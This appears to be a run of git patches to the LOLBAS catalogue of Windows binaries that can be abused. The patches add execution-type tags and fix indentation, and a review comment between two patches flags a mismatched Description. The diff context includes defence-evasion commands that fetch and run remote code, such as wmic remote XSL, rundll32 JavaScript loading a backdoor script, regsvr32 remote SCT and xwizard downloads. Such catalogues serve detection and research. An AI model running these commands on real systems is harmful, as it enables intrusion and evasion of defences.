@@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\wlrmdr.exe Code_Sample: From 6959072271e8a56222948b54985417338ad4f8cf Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:31:47 +0200 Subject: [PATCH 069/148] Update Wmic.yml Tags Added Tags: Execute: EXE Execute: Remote Execute: XSL --- yml/OSBinaries/Wmic.yml | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index 8c1a996e..133c4a8c 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: wmic.exe process call create calc Description: Execute calc from wmic Usecase: Execute binary from wmic to evade defensive counter measures @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" Description: Execute evil.exe on the remote system. Usecase: Execute binary on a remote system @@ -25,6 +29,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE + - Execute: Remote - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" Description: Create a volume shadow copy of NTDS.dit that can be copied. Usecase: Execute binary on remote system 
@@ -32,6 +39,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: XSL + - Execute: Remote - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. Usecase: Execute script from remote system @@ -40,7 +50,8 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: XSL + - Execute: Remote - Command: wmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe" Description: Copy file from source to destination. Usecase: Copy file. From 9a4b3e2b8e9d9260907d5bf6ee9b4a7d72884d2e Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:32:39 +0200 Subject: [PATCH 070/148] Update WorkFolders.yml Tags Added Tags: Execute: EXE --- yml/OSBinaries/WorkFolders.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml index ef8045c9..6287b770 100644 --- a/yml/OSBinaries/WorkFolders.yml +++ b/yml/OSBinaries/WorkFolders.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\WorkFolders.exe Detection: From 9c6e7222cec76ded28ece60552dbaf42e27ff6c4 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:34:23 +0200 Subject: [PATCH 071/148] Update Xwizard.yml Tags Added Tags: Execute: DLL --- yml/OSBinaries/Xwizard.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 549b6096..87076e3b 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml 
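Review bot: The `Execute: XSL` / `Execute: Remote` block added in the `@@ -32,6 +39,9 @@` hunk tags the entry for `wmic.exe process get brief /format:"https://raw.githubusercontent.com/.../Wmic_calc.xsl"`, yet that entry's Description line, visible as trailing context of the previous hunk, still reads "Create a volume shadow copy of NTDS.dit that can be copied.", which does not describe the command; since this commit is curating that entry's metadata, the Description should be corrected in the same change, mirroring the sibling entry's wording, e.g. `Description: Executes JScript or VBScript embedded in the remote XSL stylesheet fetched over HTTPS.`. Separately, the `@@ -40,7 +50,8 @@` hunk replaces an existing `- Execute: WSH` with `XSL`/`Remote` on the `pocremote.xsl` entry while its Description still says the stylesheet embeds JScript or VBScript, and the commit message lists only added tags; either keep `- Execute: WSH` alongside the new tags or state the removal and its rationale in the message, as patch 064 (Vbc.yml) does.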
@@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. Usecase: Run a com object created in registry to evade defensive counter measures @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Usecase: Download file from Internet From df306a4e0e40ca159690fcd1913e07cfa7aba26a Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:35:25 +0200 Subject: [PATCH 072/148] Update msedge_proxy.yml Tags Added Tags: Execute: CMD --- yml/OSBinaries/msedge_proxy.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 7bfe43d6..8da75b12 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -27,6 +27,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml Acknowledgement: From dd7be51f56abe5e2552a87e9cd00949c478b4c76 Mon Sep 17 00:00:00 2001 
From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:36:40 +0200 Subject: [PATCH 073/148] Update msedgewebview2.yml Tags Added Tags: Execute: EXE --- yml/OSBinaries/msedgewebview2.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/yml/OSBinaries/msedgewebview2.yml b/yml/OSBinaries/msedgewebview2.yml index 83f76cda..c89260d1 100644 --- a/yml/OSBinaries/msedgewebview2.yml +++ b/yml/OSBinaries/msedgewebview2.yml @@ -11,6 +11,8 @@ Commands: Privileges: Low privileges MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -32,6 +38,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe Detection: From 6375a4a3389f34399aa64da80f878d92f6f4e614 Mon Sep 17 00:00:00 2001 
From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:37:02 +0200 Subject: [PATCH 074/148] Update wt.yml --- yml/OSBinaries/wt.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/wt.yml b/yml/OSBinaries/wt.yml index 7b54dacd..13b34e44 100644 --- a/yml/OSBinaries/wt.yml +++ b/yml/OSBinaries/wt.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_\wt.exe Detection: From 75d04eaf722ee65d0964a22c56185dd7a3a85ae2 Mon Sep 17 00:00:00 2001 From: Hegusung Date: Sun, 13 Oct 2024 17:57:36 +0200 Subject: [PATCH 075/148] Correct identation --- yml/OSBinaries/Presentationhost.yml | 2 +- yml/OSBinaries/Provlaunch.yml | 2 +- yml/OSBinaries/Regsvr32.yml | 12 ++++++------ yml/OSBinaries/Rundll32.yml | 8 ++++---- yml/OSBinaries/Runexehelper.yml | 2 +- yml/OSBinaries/Runonce.yml | 2 +- yml/OSBinaries/Runscripthelper.yml | 2 +- yml/OSBinaries/Sc.yml | 4 ++-- yml/OSBinaries/Schtasks.yml | 4 ++-- yml/OSBinaries/Scriptrunner.yml | 6 +++--- yml/OSBinaries/Setres.yml | 2 +- yml/OSBinaries/SettingSyncHost.yml | 4 ++-- yml/OSBinaries/Ssh.yml | 4 ++-- yml/OSBinaries/Stordiag.yml | 4 ++-- yml/OSBinaries/Syncappvpublishingserver.yml | 2 +- yml/OSBinaries/Ttdinject.yml | 4 ++-- yml/OSBinaries/Tttracer.yml | 2 +- yml/OSBinaries/Unregmp2.yml | 2 +- yml/OSBinaries/Verclsid.yml | 2 +- yml/OSBinaries/Wab.yml | 2 +- yml/OSBinaries/Winget.yml | 4 ++-- yml/OSBinaries/Wlrmdr.yml | 2 +- yml/OSBinaries/Wmic.yml | 12 ++++++------ yml/OSBinaries/WorkFolders.yml | 2 +- yml/OSBinaries/Xwizard.yml | 4 ++-- yml/OSBinaries/msedge_proxy.yml | 2 +- yml/OSBinaries/msedgewebview2.yml | 8 ++++---- yml/OSBinaries/wt.yml | 2 +- 28 files changed, 54 insertions(+), 54 deletions(-) diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml index a63a2a80..0898d43f 100644 
--- a/yml/OSBinaries/Presentationhost.yml +++ b/yml/OSBinaries/Presentationhost.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: XBAP + - Execute: XBAP - Command: Presentationhost.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server diff --git a/yml/OSBinaries/Provlaunch.yml b/yml/OSBinaries/Provlaunch.yml index 7f5b18b7..16d6a119 100644 --- a/yml/OSBinaries/Provlaunch.yml +++ b/yml/OSBinaries/Provlaunch.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 Tags: - - Execute: CMD + - Execute: CMD Full_Path: - Path: c:\windows\system32\provlaunch.exe Detection: diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 43dc039d..979d24dc 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml @@ -12,8 +12,8 @@ Commands: MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: SCT - - Execute: Remote + - Execute: SCT + - Execute: Remote - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting @@ -22,7 +22,7 @@ Commands: MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: SCT + - Execute: SCT - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting 
@@ -31,8 +31,8 @@ Commands: MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: SCT - - Execute: Remote + - Execute: SCT + - Execute: Remote - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting @@ -41,7 +41,7 @@ Commands: MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: SCT + - Execute: SCT Full_Path: - Path: C:\Windows\System32\regsvr32.exe - Path: C:\Windows\SysWOW64\regsvr32.exe diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index e1bb40c7..5d60b292 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -30,7 +30,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: JScript + - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. Usecase: Proxy execution @@ -39,7 +39,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: JScript + - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. Usecase: Proxy execution 
@@ -48,7 +48,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: JScript + - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Usecase: Execute code from Internet @@ -57,7 +57,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: JScript + - Execute: JScript - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). Usecase: Execute code from alternate data stream diff --git a/yml/OSBinaries/Runexehelper.yml b/yml/OSBinaries/Runexehelper.yml index 545b1c19..eafab600 100644 --- a/yml/OSBinaries/Runexehelper.yml +++ b/yml/OSBinaries/Runexehelper.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\runexehelper.exe Detection: diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index fb024752..40b17aaa 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: CMD + - Execute: CMD Full_Path: - Path: C:\Windows\System32\runonce.exe - Path: C:\Windows\SysWOW64\runonce.exe diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index 2e58c2ed..535aeff5 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml 
@@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: Powershell + - Execute: Powershell Full_Path: - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml index bd016f04..7766c069 100644 --- a/yml/OSBinaries/Sc.yml +++ b/yml/OSBinaries/Sc.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: sc config binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start Description: Modifies an existing service and executes the file stored in the ADS. Usecase: Execute binary file hidden inside an alternate data stream @@ -21,7 +21,7 @@ Commands: MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Windows\System32\sc.exe - Path: C:\Windows\SysWOW64\sc.exe diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index c37e48e0..82f9ab2b 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily Description: Create a scheduled task on a remote computer for persistence/lateral movement Usecase: Create a remote task to run daily relative to the the time of creation 
@@ -21,7 +21,7 @@ Commands: MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index 4c5b1416..bd8b1189 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" Description: Executes calc.cmd from remote server Usecase: Execute binary through proxy binary from external server to evade defensive counter measures @@ -21,8 +21,8 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: Remote - - Execute: CMD + - Execute: Remote + - Execute: CMD Full_Path: - Path: C:\Windows\System32\scriptrunner.exe - Path: C:\Windows\SysWOW64\scriptrunner.exe diff --git a/yml/OSBinaries/Setres.yml b/yml/OSBinaries/Setres.yml index 6797060b..4e4dd1da 100644 --- a/yml/OSBinaries/Setres.yml +++ b/yml/OSBinaries/Setres.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\setres.exe Detection: diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml index 13fb36fa..2fbd1f63 100644 --- a/yml/OSBinaries/SettingSyncHost.yml +++ b/yml/OSBinaries/SettingSyncHost.yml 
@@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: EXE + - Execute: EXE - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32. Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file. @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Windows\System32\SettingSyncHost.exe - Path: C:\Windows\SysWOW64\SettingSyncHost.exe diff --git a/yml/OSBinaries/Ssh.yml b/yml/OSBinaries/Ssh.yml index 6d651b18..27a9f125 100644 --- a/yml/OSBinaries/Ssh.yml +++ b/yml/OSBinaries/Ssh.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10 1809, Windows Server 2019 Tags: - - Execute: EXE + - Execute: EXE - Command: ssh -o ProxyCommand=calc.exe . Description: Executes calc.exe from ssh.exe Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -21,7 +21,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\OpenSSH\ssh.exe Detection: diff --git a/yml/OSBinaries/Stordiag.yml b/yml/OSBinaries/Stordiag.yml index aa42bf6a..8c62daf9 100644 --- a/yml/OSBinaries/Stordiag.yml +++ b/yml/OSBinaries/Stordiag.yml 
@@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10 Tags: - - Execute: EXE + - Execute: EXE - Command: stordiag.exe Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it. Usecase: Possible defence evasion purposes. @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\stordiag.exe - Path: c:\windows\syswow64\stordiag.exe diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index ec4e8b0a..3d0cdd57 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 Tags: - - Execute: Powershell + - Execute: Powershell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 42f0d664..145bd6fc 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10 2004 and above, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Usecase: Spawn process using other binary 
@@ -21,7 +21,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10 1909 and below Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\Syswow64\ttdinject.exe diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml index c12ae91f..7c51f382 100644 --- a/yml/OSBinaries/Tttracer.yml +++ b/yml/OSBinaries/Tttracer.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10 1809 and newer, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: TTTracer.exe -dumpFull -attach pid Description: Dumps process using tttracer.exe. Requires administrator privileges Usecase: Dump process by PID diff --git a/yml/OSBinaries/Unregmp2.yml b/yml/OSBinaries/Unregmp2.yml index fabfae40..541818d2 100644 --- a/yml/OSBinaries/Unregmp2.yml +++ b/yml/OSBinaries/Unregmp2.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Windows\System32\unregmp2.exe - Path: C:\Windows\SysWOW64\unregmp2.exe diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index 27511832..e42e6b74 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.012 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: DLL Full_Path: - Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml index c8e61fce..6fa837fe 100644 --- a/yml/OSBinaries/Wab.yml +++ b/yml/OSBinaries/Wab.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: DLL Full_Path: - Path: C:\Program Files\Windows Mail\wab.exe - Path: C:\Program Files (x86)\Windows Mail\wab.exe diff --git a/yml/OSBinaries/Winget.yml b/yml/OSBinaries/Winget.yml index d6be4bc4..f914071f 100644 
--- a/yml/OSBinaries/Winget.yml +++ b/yml/OSBinaries/Winget.yml @@ -12,8 +12,8 @@ Commands: MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: Remote - - Execute: EXE + - Execute: Remote + - Execute: EXE - Command: winget.exe install --accept-package-agreements -s msstore [name or ID] Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.' Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked diff --git a/yml/OSBinaries/Wlrmdr.yml b/yml/OSBinaries/Wlrmdr.yml index 10f96cce..913ce053 100644 --- a/yml/OSBinaries/Wlrmdr.yml +++ b/yml/OSBinaries/Wlrmdr.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\wlrmdr.exe Code_Sample: diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index 133c4a8c..49d52efc 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: wmic.exe process call create calc Description: Execute calc from wmic Usecase: Execute binary from wmic to evade defensive counter measures @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" Description: Execute evil.exe on the remote system. Usecase: Execute binary on a remote system 
@@ -30,8 +30,8 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE - - Execute: Remote + - Execute: EXE + - Execute: Remote - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" Description: Create a volume shadow copy of NTDS.dit that can be copied. Usecase: Execute binary on remote system @@ -40,8 +40,8 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: XSL - - Execute: Remote + - Execute: XSL + - Execute: Remote - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. Usecase: Execute script from remote system diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml index 6287b770..d2dd19a8 100644 --- a/yml/OSBinaries/WorkFolders.yml +++ b/yml/OSBinaries/WorkFolders.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 